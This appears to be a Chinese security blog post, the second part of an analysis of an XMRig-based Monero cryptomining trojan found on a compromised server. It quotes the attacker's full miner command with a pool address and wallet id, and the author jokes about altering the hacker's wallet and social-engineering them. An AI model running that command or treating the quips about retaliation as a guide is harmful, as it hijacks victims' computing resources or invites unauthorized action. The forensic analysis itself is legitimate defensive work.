今天接着对这个进行分析,由于经验不足,没有对其log文件进行深入研究,昨天给那个md(挖矿木马)给了同事,然后他告诉我确定是个XMR(门罗币)挖矿,然后发送了一张图给我
文章图片
【系统|挖矿分析-2】注意到这个地址:fee.xmrig.com:443
我们对其google一下:
文章图片
再次确定了这个XMRIG是个XMR的CPU矿工,然后我们继续查找,在github上发现这个XMRIG是个开源挖矿工具,C++写的
地址是:https://github.com/xmrig/xmrig#usage
文章图片
我们把这个挖矿工具先下载到我们的服务器上
git clone https://github.com/xmrig/xmrig.git
对其编译,运行,这里先暂停一下
我们把注意力放到XMRIG这个挖矿工具的一个配置文件config.json
文章图片
可以知道黑客挖矿的话所有的门罗币都是通过"url": "failover.xmrig.com:443"这个矿池来处理。
再次回到之前的受害服务器的log文件,定位到所有的md文件的命令操作,发现一条重要命令,通过查询发现,这条命令是运行md挖矿木马的命令
文章图片
使用那条命令,我们将其md文件拷贝到本机的kali下面进行分析
文章图片
通过查询该ip地址115.234.218.70,地点是爱尔兰,就是矿池的ip
文章图片
接下来,我们重点分析一下之前的那条命令
./md --cpu-affinity=0xFFFFFFFF --cpu-priority=5 --max-cpu-usage=90 --donate-level=1 --nicehash -o stratum+tcp://185.234.218.70:80 -u 9b270a4a353480ceb04c8bbe879f66 -p x -k
-cpu-affinity=0xFFFFFFFF --cpu-priority=5 --max-cpu-usage=90,这几个都是cpu配置参数,我们不管,--donate-level=1,这个--donate-level是默认捐赠比例,XMRIG软件默认的捐赠是 5 %,最低为 1 % ,--nicehash -o stratum+tcp://185.234.218.70:80 ,这个是矿场配置。stratum是一种服务器的覆盖协议,-u 9b270a4a353480ceb04c8bbe879f66,这个比较重要,指向的是黑客的XMR钱包(我们可以篡改他的钱包地址哈哈)
文章图片
文章图片
我们现在最关心的事情就是黑客的ip地址,然后社工一波黑客,嘿嘿,坐等接下来的分析把...
这里我补充一下门罗币挖矿流程:
文章图片
参考链接:
https://mp.weixin.qq.com/s?__biz=MzAwMTUwNDMwMQ==&mid=305803785&idx=1&sn=947011819671cb989f3866d3aa6f22b2&mpshare=1&scene=1&srcid=04274nmPA3dpwY3NnGZPOF4B#rd
https://blog.csdn.net/xiao_tata/article/details/78888782
https://en.bitcoin.it/wiki/Stratum
https://www.nicehash.com/?lang=zh
https://github.com/xmrig/xmrig